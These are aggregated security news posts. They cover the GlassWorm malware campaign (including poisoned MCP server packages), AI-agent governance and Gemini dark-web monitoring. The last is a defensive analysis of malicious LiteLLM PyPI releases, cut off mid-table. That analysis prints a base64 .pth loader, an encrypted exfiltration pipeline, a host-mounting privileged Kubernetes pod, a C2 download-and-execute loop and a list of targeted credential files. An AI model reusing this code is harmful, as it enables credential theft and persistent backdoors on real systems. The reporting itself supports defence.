<p>Threat researchers with various vendors for the past year have been tracking the efforts of a bad actor dubbed GlassWorm, known for dropping malicious extensions in code registries like npm, Open VSX, PyPI, and Microsoft’s Visual Studio Marketplace with the aim of stealing secrets and cryptocurrency.</p><p>This month, threat researchers wrote about a resurgence in activity by an evolved GlassWorm that includes new features and capabilities, including the ability to drop a remote access trojan (RAT), a focus on Model Context Protocol (MCP) servers, and what Socket analysts called a “significant escalation in how it spreads through Open VSX.” These join other features already known about GlassWorm, including the use of hidden Unicode characters to compromise GitHub repositories.</p><p>Aikido Security researchers found a multi-stage framework that installs a persistent RAT and another capability to force install a Chrome extension dressed to appear as Google Docs Offline.</p><p>GlassWorm now “logs keystrokes, dumps cookies and session tokens, captures screenshots, and takes commands from a C2 server hidden in a Solana blockchain memo,” Aikido malware researcher Ilyas Makari <a href="https://www.aikido.dev/blog/glassworm-chrome-extension-rat" target="_blank" rel="noopener">wrote in a report</a>.</p><p>A Koi security researcher wrote that in this fifth wave of GlassWorm attacks, the threat actor is using its <a href="https://www.koi.ai/blog/glassworm-hits-mcp-5th-wave-with-new-delivery-techniques" target="_blank" rel="noopener">invisible Unicode tactic with MCP servers</a>, along with GitHub repositories and hundreds of extensions.</p><p>For their part, Socket researchers wrote about how the malware now <a href="https://socket.dev/blog/open-vsx-transitive-glassworm-campaign" target="_blank" rel="noopener">moves through Open VSX</a>.</p><h3>Same Tradecraft, Better Evasion</h3><p>“Instead of requiring every malicious listing to embed the loader directly, the threat actor is now abusing extensionPack and extensionDependencies to turn initially standalone-looking extensions into transitive delivery vehicles in later updates, allowing a benign-appearing package to begin pulling a separate GlassWorm-linked extension only after trust has already been established,” the Socket researchers wrote.</p><p>The bad actor has kept the core GlassWorm tradecraft, but improves the malware’s ability to evade detection, they wrote.</p><p>“The newer variants still use staged JavaScript execution, Russian locale/timezone geofencing, Solana transaction memos as dead drops, and in-memory follow-on code execution, but they now rotate infrastructure and loader logic more aggressively,” the Socket researchers wrote.</p><h3>Finding the RAT</h3><p>The first stage of the latest GlassWorm variant seen by Aikido is similar to previous ones, according to Makari. The threat actor publishes malicious packages across npm, PyPI, GitHub, and Open VSX, both creating new packages and compromising maintainer accounts to push malicious versions of legitimate projects.</p><p>The variants either use an invisible Unicode loader – a technique researchers outlined last year – or a typical obfuscated preinstall script, and both share the same Solana 2 blockchain command-and-control (C2) beacon.</p><p>“The loader polls in a 10-second loop until it finds a transaction with a non-null memo field,” he wrote. “Solana’s memo feature was designed to add annotations to transactions, but here it functions as a covert dead-drop. The memos are permanent, publicly visible on-chain, and stored on infrastructure that cannot be taken down by any single party.”</p><p>The payload used in the second stage delivers a framework used to harvest credentials, steal crypto wallets, exfiltrate cloud secrets, and profile hosts.</p><p>For the third stage, the malware downloads a phishing binary for crypto wallets and the RAT that can steal browser credentials, bypass Chrome app encryption, deploy HVNC modules for remote access, and install a malicious browser extension.</p><h3>Turning to MCP Servers</h3><p>Koi security researcher Lotan Sery wrote that GlassWorm has “crawled into a place that should worry every developer building with AI tools: MCP servers.”</p><p>Koi’s risk engine pointed to a new npm package that initially looked to researchers as a legitimate MCP server – proper TypeScript, real dependencies, and a valid repository link – but eventually they found the GlassWorm signature: the same decoder, invisible Unicode variation selectors, and the same technique used in previous waves.</p><p>MCP servers are used to connect AI models to external data sources, tools, and applications, and have become a <a href="https://securityboulevard.com/2026/01/anthropic-microsoft-mcp-server-flaws-shine-a-light-on-ai-security-risks/" target="_blank" rel="noopener">worry of many security pros</a>.</p><p>“A compromised MCP server doesn’t need to hunt for credentials,” Sery wrote, noting that five versions, 1.3.0 through 1.3.4, in a single day. “They’re handed to it. That’s the whole point.”</p><p>Researchers found that the attacker forked the legitimate watercrawl-mcp repository to GitHub, injected the invisible payload, and published it under a new @iflow-mcp scope, a namespace created for the attack.</p><p>“This is GlassWorm’s first confirmed move into the MCP ecosystem,” she wrote. “And given how fast AI-assisted development is growing – and how much trust MCP servers are given by design – this won’t be the last.”</p><h3>Malicious Open VSX Extensions</h3><p>Socket researchers said that since January 31, they’ve identified at least 72 malicious extensions linked to the GlassWorm campaign, though Open VSX has since removed most of them. The malware has continued to evolve since the end of January.</p><p>That includes updating components most likely to be exposed, rotating the Solana infrastructure, adding C2 IPs, hardening the loader with heavier obfuscation, and shifting decryption material from the extension to operator-controlled HTTP response headers.</p><p>“GlassWorm is moving toward less visible, more resilient delivery: later-version manifest changes, transitive installation paths, heavier obfuscation, rotating Solana wallets and infrastructure, and threat actor-controlled decryption material,” they wrote. “Defenders should expect more extensions that look benign at publication, then become malicious through updates that add extensionPack or extensionDependencies. That model is likely to spread because it hides the real malicious component behind normal extension-management behavior.”</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/an-evolving-glassworm-malware-is-making-the-rounds-of-code-repositories/" data-a2a-title="An Evolving GlassWorm Malware is Making the Rounds of Code Repositories"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fan-evolving-glassworm-malware-is-making-the-rounds-of-code-repositories%2F&amp;linkname=An%20Evolving%20GlassWorm%20Malware%20is%20Making%20the%20Rounds%20of%20Code%20Repositories" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fan-evolving-glassworm-malware-is-making-the-rounds-of-code-repositories%2F&amp;linkname=An%20Evolving%20GlassWorm%20Malware%20is%20Making%20the%20Rounds%20of%20Code%20Repositories" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fan-evolving-glassworm-malware-is-making-the-rounds-of-code-repositories%2F&amp;linkname=An%20Evolving%20GlassWorm%20Malware%20is%20Making%20the%20Rounds%20of%20Code%20Repositories" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fan-evolving-glassworm-malware-is-making-the-rounds-of-code-repositories%2F&amp;linkname=An%20Evolving%20GlassWorm%20Malware%20is%20Making%20the%20Rounds%20of%20Code%20Repositories" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fan-evolving-glassworm-malware-is-making-the-rounds-of-code-repositories%2F&amp;linkname=An%20Evolving%20GlassWorm%20Malware%20is%20Making%20the%20Rounds%20of%20Code%20Repositories" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<div class="hs-featured-image-wrapper"> <a href="https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale" title="" class="hs-featured-image-link"> <img decoding="async" src="https://www.sonatype.com/hubfs/blog_grounded_intelligence.jpg" alt="Image of a hexagon shape with yellow outline with an icon representing a human head at the center" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"> </a> </div><p>One experience has become nearly universal a<span style="text-decoration: none;">s </span><a href="https://www.sonatype.com/resources?category=186977656491" style="text-decoration: none;"><span style="color: #1155cc;">AI systems</span></a><span style="text-decoration: none;"> m</span>ove deeper into software development, their confidence when they’re wrong.</p><p><img decoding="async" src="https://track.hubspot.com/__ptq.gif?a=1958393&amp;k=14&amp;r=https%3A%2F%2Fwww.sonatype.com%2Fblog%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale&amp;bu=https%253A%252F%252Fwww.sonatype.com%252Fblog&amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale/" data-a2a-title="Grounded Intelligence Is Key to Safe AI Software Development at Scale"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Aaron Linskens">Aaron Linskens</a>. Read the original post at: <a href="https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale">https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale</a> </p>

<p>Entro Security has announced Agentic Governance &amp; Administration (AGA), a new pillar of its platform designed to help security and identity teams govern AI agents and AI access paths across enterprise systems. The company is showcasing AGA at RSA Conference 2026.</p><p>The core problem AGA addresses is one that traditional Identity Governance and Administration (IGA) tools weren’t built to solve. Existing IGA platforms govern people and applications, but agentic AI operates differently. The “user” is often an AI service or locally running agent. Access paths run through non-human identities: tokens, service accounts, API keys, and secrets. And the blast radius is shaped by OAuth scopes, integrations, and automation, not a single human login.</p><p>“Enterprise AI adoption rarely starts with a strategy deck. It starts with a connection,” said Itzik Alvas, Co-Founder and CEO of Entro Security. “A developer connects a tool to an LLM, a team installs an AI app in SaaS, or someone authenticates an agent against SharePoint, GitHub, Salesforce, or internal APIs. It works, spreads fast, and then security teams get questions they can’t answer fast enough. Who connected what, to which systems, with what permissions, and using which identities? Our AGA helps teams regain clarity and control as AI access becomes the default.”</p><p>AGA applies the same governance fundamentals that IAM teams already know, adapted for a world where agents connect in seconds, operate continuously, and drift as adoption spreads. The capability covers inventory, ownership, least privilege, auditability, and enforcement, applied to AI assistants, agent platforms, and locally running agents.</p><p>On the technical side, AGA builds a structured profile for each AI agent by pulling from three layers: sources (endpoint telemetry, agent foundries, cloud environments, MCP servers), targets (enterprise assets and applications the agent touches), and identities (human, non-human, or secret identities used to access those targets).</p><p>Two core capabilities sit on top of that foundation. Shadow AI Discovery uses EDR integrations to surface AI clients and local agent runtimes on workstations, and connects natively with agent foundries including AWS Bedrock and Copilot Studio to discover agents and the non-human identities they rely on. AI Agents Monitoring and Enforcement adds MCP activity visibility and policy controls, giving teams audit trails of allowed and blocked activity and controls to reduce sensitive data and secret exposure.</p><p>AGA is available now as part of the Entro platform.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/entro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise/" data-a2a-title="Entro Security Launches AGA to Govern AI Agents and Non-Human Identities Across the Enterprise"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

Mel Schilling emerged as one of Australian television's most recognisable relationship experts. On Tuesday, she died of bowel cancer at the age of 54. As a judge on the hit reality show Married At … [+5692 chars]

Newcastle Australias newly launched Master of Cyber Security currently offered part-time is designed to build that breadth and depth. The programme prepares professionals for roles such as security a… [+1859 chars]

<p>Google has launched a new dark web intelligence service to tackle the grueling task of monitoring underground criminal forums.</p><p>It is deploying Gemini-powered artificial intelligence (AI) agents to sift through upwards of 10 million posts daily, the tech giant said, to replace clunky, keyword-based legacy systems with a platform that understands the context of a threat.</p><p>The service, currently in public preview as part of Google Threat Intelligence, marks a shift from reactive monitoring to proactive profiling. According to Google threat hunters, internal testing indicates the AI can analyze millions of external events with an impressive 98% accuracy rate.</p><p>As cybercriminals increasingly adopt AI to craft more sophisticated attacks, Google is betting that its own generative models are the only way for defenders to keep pace with the sheer volume of modern digital threats.</p><p>Traditional dark web monitoring has long been a headache for security teams. These older tools typically rely on regex (regular expressions) and simple keyword scraping, which Brandon Wood, Google Threat Intelligence product manager, says results in an 80% to 90% false-positive rate.</p><p>“It mostly just creates noise,” Wood told The Register. “We are now processing every post from the dark web using Gemini, and from there distilling down what threats actually matter.”</p><p>The process begins with Gemini building a comprehensive profile of a client organization — such as a bank or healthcare provider — by analyzing its business operations, VIPs, brands, and technology stack. The profile is built using cited, publicly available information to maintain transparency. Once established, Gemini compares this profile against real-time dark web data, including initial access broker activity and leaked credentials.</p><p>The true power of the system lies in its ability to handle ambiguity. For example, if a cybercriminal advertises access to a large North American bank with $50 billion in assets without naming the victim, Gemini can cross-reference those specific metrics against its client profiles. If the data matches a user like Acme Bank, the system triggers a high-severity alert.</p><p>To refine its judgment, Gemini integrates insights from Google’s human analysts, who currently track 627 distinct threat groups. This hybrid intelligence allows the AI to weigh the reputation of the threat actor against the sensitivity of the leaked data.</p><p>Beyond dark web monitoring, Google is expanding AI agents into its Security Operations (SecOps) suite to automate incident response. These agents can autonomously investigate alerts, gather evidence, and provide a verdict on whether a breach has occurred, complete with a written explanation of their reasoning.</p><p>However, the move toward autonomous security agents is not without its critics. Security experts warn that giving AI agents deep access to corporate environments could inadvertently create a new attack vector for hackers to exploit.</p><p>Wood addressed these concerns by emphasizing that Google is focusing on “publicly available information and context that the user chooses to provide.” He noted that transparency and user control remain central to the platform’s integration.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/google-unleashes-gemini-ai-to-scour-dark-web-for-corporate-threats/" data-a2a-title="Google Unleashes Gemini AI to Scour Dark Web for Corporate Threats"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgoogle-unleashes-gemini-ai-to-scour-dark-web-for-corporate-threats%2F&amp;linkname=Google%20Unleashes%20Gemini%20AI%20to%20Scour%20Dark%20Web%20for%20Corporate%20Threats" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgoogle-unleashes-gemini-ai-to-scour-dark-web-for-corporate-threats%2F&amp;linkname=Google%20Unleashes%20Gemini%20AI%20to%20Scour%20Dark%20Web%20for%20Corporate%20Threats" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgoogle-unleashes-gemini-ai-to-scour-dark-web-for-corporate-threats%2F&amp;linkname=Google%20Unleashes%20Gemini%20AI%20to%20Scour%20Dark%20Web%20for%20Corporate%20Threats" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgoogle-unleashes-gemini-ai-to-scour-dark-web-for-corporate-threats%2F&amp;linkname=Google%20Unleashes%20Gemini%20AI%20to%20Scour%20Dark%20Web%20for%20Corporate%20Threats" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgoogle-unleashes-gemini-ai-to-scour-dark-web-for-corporate-threats%2F&amp;linkname=Google%20Unleashes%20Gemini%20AI%20to%20Scour%20Dark%20Web%20for%20Corporate%20Threats" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p><strong>Last Updated:</strong> March 24, 2026 – 1:15 PM ET</p><p>Part 1 covered CanisterWorm, the self-spreading npm worm. This post covers the next wave: a malicious LiteLLM PyPI package carrying the most capable credential stealer TeamPCP has deployed yet.</p><p>On March 24, 2026, two versions of <code>litellm</code>, one of the most widely used Python libraries for working with AI language model APIs, were published to PyPI carrying a hidden credential stealer. Versions <code>1.82.7</code> and <code>1.82.8</code> never appeared on the official LiteLLM GitHub repository. They were published directly to PyPI using credentials stolen from a maintainer account, which TeamPCP obtained as part of their ongoing cascade of supply chain compromises.</p><h2 class="wp-block-heading" id="how-teampcp-got-into-litellm"><strong>How TeamPCP got into LiteLLM</strong></h2><p>To understand this attack you need to follow the credential chain back four days.</p><p>On March 19, TeamPCP force-pushed malicious commits over 75 of 76 version tags of <code>aquasecurity/trivy-action</code> and poisoned Trivy release <code>v0.69.4</code>. Any CI/CD pipeline that ran Trivy that day had its secrets harvested and exfiltrated to the attacker.</p><p>LiteLLM’s CI pipeline (<code>ci_cd/security_scans.sh</code>) installed Trivy via apt without pinning a version. When the pipeline ran on March 23, it pulled the poisoned Trivy build. The stealer inside Trivy ran inside LiteLLM’s CI environment, collected everything, including <code>PYPI_PUBLISH_PASSWORD</code> for the krrishdholakia maintainer account, and shipped it to <code>checkmarx.zone</code>.</p><p>On March 23, TeamPCP also compromised <code>checkmarx/kics-github-action</code> (all 35 tags hijacked) and <code>checkmarx/ast-github-action</code> (version 2.3.28 poisoned), expanding their credential collection to every pipeline that used Checkmarx scanning. The litellm.cloud domain was registered the same day.</p><p>By March 24 they had everything they needed. Two malicious LiteLLM versions hit PyPI within hours of each other.</p><h2 class="wp-block-heading" id="what-changed-between-1-82-7-and-1-82-8"><strong>What changed between 1.82.7 and 1.82.8</strong></h2><p>The two versions represent a deliberate escalation in how the payload triggers.</p><p><strong>Version 1.82.7</strong> hid the malicious code inside <code>litellm/proxy/proxy_server.py</code>. The payload only ran when a developer or application explicitly imported <code>litellm.proxy</code>, a common path when running the LiteLLM proxy server, but not universal.</p><p><strong>Version 1.82.8</strong> moved the same payload into a file named <code>litellm_init.pth</code> placed in the package’s site-packages directory. This changes everything. Python’s site module processes every .pth file in site-packages on startup, executing any line that begins with <code>import</code>. No import statement is needed in application code. No user interaction. <strong>The payload fires every time Python starts on the infected machine</strong>, regardless of whether LiteLLM is ever used.</p><p>The upgrade from a module-level hook to a <code>.pth</code>-level hook is significant: it means the malware persists and re-runs even after the malicious package is uninstalled, as long as the <code>.pth</code> file remains in site-packages.</p><h2 class="wp-block-heading" id="technical-analysis"><strong>Technical analysis</strong></h2><h3 class="wp-block-heading" id="three-layers-one-goal"><strong>Three layers, one goal</strong></h3><p>The payload uses three nested layers of base64 encoding to obscure its code from static scanners.</p><pre class="wp-block-code"><code>import os, subprocess, sys; subprocess.Popen([sys.executable, "-c",   "import base64; exec(base64.b64decode('&lt;blob&gt;'))"],   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)</code></pre><p>_{<strong>Figure 1:</strong> Outer <code>.pth</code> execution — fires on every Python startup with no user action}</p><p>Decoding the blob reveals the orchestrator script, which holds an embedded RSA-2048 public key and a second base64-encoded payload (the harvester). The orchestrator runs the harvester as a subprocess, captures everything it prints to stdout, encrypts the output, and ships it out.</p><pre class="wp-block-code"><code>subprocess.run(["openssl", "rand", "-out", sk, "32"]) subprocess.run(["openssl", "enc", "-aes-256-cbc", "-in", collected,     "-out", ef, "-pass", f"file:{sk}", "-pbkdf2"]) subprocess.run(["openssl", "pkeyutl", "-encrypt", "-pubin",     "-inkey", pk, "-in", sk, "-out", ek,     "-pkeyopt", "rsa_padding_mode:oaep"]) # bundles as tpcp.tar.gz, POSTs to models.litellm.cloud</code></pre><p>_{<strong>Figure 2:</strong> Encryption and exfiltration pipeline — output is encrypted before leaving the machine}</p><p>The data is AES-256-CBC encrypted with a random session key. The session key is RSA-OAEP encrypted with the attacker’s public key. Only the attacker can decrypt what was stolen. The archive is named <code>tpcp.tar.gz</code>, a direct self-reference by TeamPCP.</p><h3 class="wp-block-heading" id="the-credential-harvester"><strong>The credential harvester</strong></h3><p>The second-stage script is an exhaustive credential collector. In plain terms: it reads every file on the system that could contain a password, token, or private key, and sends all of it.</p><p>It specifically targets:</p><ul class="wp-block-list"> <li><strong>SSH keys</strong> – all key types, authorized_keys, known_hosts, host keys from<code> /etc/ssh</code></li> <li><strong>AWS credentials</strong> – environment variables, <code>~/.aws/credentials</code>, and live queries to the EC2 Instance Metadata Service (IMDS) to steal IAM role credentials</li> <li><strong>Kubernetes</strong> – service account tokens, <code>~/.kube/config</code>, all secrets across all namespaces via the K8s API</li> <li><strong>GCP and Azure</strong> – application default credentials, <code>~/.azure</code> directory contents</li> <li><strong>Docker</strong> – <code>config.json</code> including registry tokens, Kaniko build credentials</li> <li><strong>npm tokens</strong> – <code>~/.npmrc</code> (connecting directly to the npm side of this campaign)</li> <li><strong>Database configs</strong> – <code>.pgpass, .my.cnf, redis.conf, .mongorc.js</code></li> <li><strong>Environment files</strong> – <code>.env, .env.production, .env.staging</code> searched recursively to depth 6 across <code>/home, /opt, /srv, /var/www, /app, /data, /tmp</code></li> <li><strong>Cryptocurrency wallets</strong> — Bitcoin, Ethereum keystores, Solana validator keypairs, Cardano signing keys, Zcash, Ripple, Litecoin, Dogecoin</li> <li><strong>TLS/SSL private keys</strong> — <code>*.pem, *.key, *.p12, *.pfx</code>, Let’s Encrypt certs</li> <li><strong>CI/CD secrets</strong> — <code>terraform.tfvars, terraform.tfstate</code>, Jenkinsfile, <code>.travis.yml, .gitlab-ci.yml, .drone.yml</code></li> <li><strong>System information</strong> — hostname, username, full <code>printenv, /etc/passwd, /etc/shadow</code>, SSH login history</li> </ul><p>It also queries the AWS Secrets Manager and SSM Parameter Store directly using any AWS credentials it finds.</p><h3 class="wp-block-heading" id="kubernetes-cluster-escape"><strong>Kubernetes cluster escape</strong></h3><p>If the infected machine is running inside a Kubernetes pod with a service account token at <code>/var/run/secrets/kubernetes.io/serviceaccount/token</code>, the harvester escalates:</p><pre class="wp-block-code"><code>pod_manifest = {     'spec': {         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}]     } } k8s_post('/api/v1/namespaces/kube-system/pods', pod_manifest)</code></pre><p>_{<strong>Figure 3:</strong> Privileged pod manifest deployed to every cluster node, mounts the host filesystem via chroot}</p><p>It enumerates every node in the cluster and deploys this pod to each one. The pod mounts <code>/</code> from the host and uses <code>chroot</code> to install the backdoor directly onto the underlying node, outside the container boundary.</p><h3 class="wp-block-heading" id="persistence-backdoor"><strong>Persistence backdoor</strong></h3><p>After exfiltration, the harvester drops a polling backdoor to <code>~/.config/sysmon/sysmon.py</code> and registers it as a systemd user service (<code>sysmon.service</code>). The backdoor checks <code>https://checkmarx.zone/raw</code> every 50 minutes for a URL, downloads whatever binary it points to, writes it to <code>/tmp/pglog</code>, and executes it.</p><pre class="wp-block-code"><code>C_URL   = "https://checkmarx.zone/raw" TARGET  = "/tmp/pglog" STATE   = "/tmp/.pg_state" time.sleep(300)   # 5-minute sandbox evasion delay while True:     l = g()       # fetch URL from C2     if l and l != prev and "youtube.com" not in l:         e(l)      # download and execute     time.sleep(3000)</code></pre><p>_{<strong>Figure 4:</strong> C2 polling loop with YouTube kill-switch — identical logic to CanisterWorm’s pgmon backdoor}</p><p>The <code>youtube.com</code> kill-switch, the <code>/tmp/pglog</code> target path, the <code>/tmp/.pg_state</code> state file, and the 300/3000 second timing are <strong>identical</strong> to the backdoor deployed by CanisterWorm on npm. This is the same codebase, the same actor.</p><h2 class="wp-block-heading" id="attribution-same-actor-bigger-payload"><strong>Attribution: Same actor, bigger payload</strong></h2><p>The connection to TeamPCP and CanisterWorm is direct:</p><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Indicator</strong></th> <th><strong>This malware</strong></th> <th><strong>CanisterWorm (npm)</strong></th> </tr> </thead> <tbody> <tr> <td>Exfil archive</td> <td><code>tpcp.tar.gz</code></td> <td>actor name “TeamPCP”</td> </tr> <tr> <td>C2 state file</td> <td><code>/tmp/.pg_state</code></td> <td><code>/tmp/.pg_state</code></td> </tr> <tr> <td>C2 payload target</td> <td><code>/tmp/pglog</code></td> <td><code>/tmp/pglog</code></td> </tr> <tr> <td>Backdoor poll interval</td> <td>3000 seconds</td> <td>3000 seconds</td> </tr> <tr> <td>Startup delay</td> <td>300 seconds</td> <td>300 seconds</td> </tr> <tr> <td>Kill-switch</td> <td><code>youtube.com not in url</code></td> <td><code>youtube.com not in url</code></td> </tr> <tr> <td>Persistence mechanism</td> <td>systemd user service</td> <td>systemd user service</td> </tr> </tbody> </table> </figure><p>The LiteLLM payload is a significant capability upgrade over CanisterWorm. Where CanisterWorm’s Python backdoor slot held a placeholder (<code>hello123</code>), this is the real thing, a production-grade stealer with AWS API integration, K8s cluster escape, cryptocurrency wallet enumeration, and RSA-encrypted exfiltration.</p><h2 class="wp-block-heading" id="indicators-of-compromise"><strong>Indicators of compromise</strong></h2><h3 class="wp-block-heading" id="network"><strong>Network</strong></h3><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Indicator</strong></th> <th><strong>Purpose</strong></th> </tr> </thead> <tbody> <tr> <td><code>hxxps://models.litellm[.]cloud/</code></td> <td>Exfiltration endpoint</td> </tr> <tr> <td><code>hxxps://checkmarx[.]zone/raw</code></td> <td>C2 polling for payload URL</td> </tr> <tr> 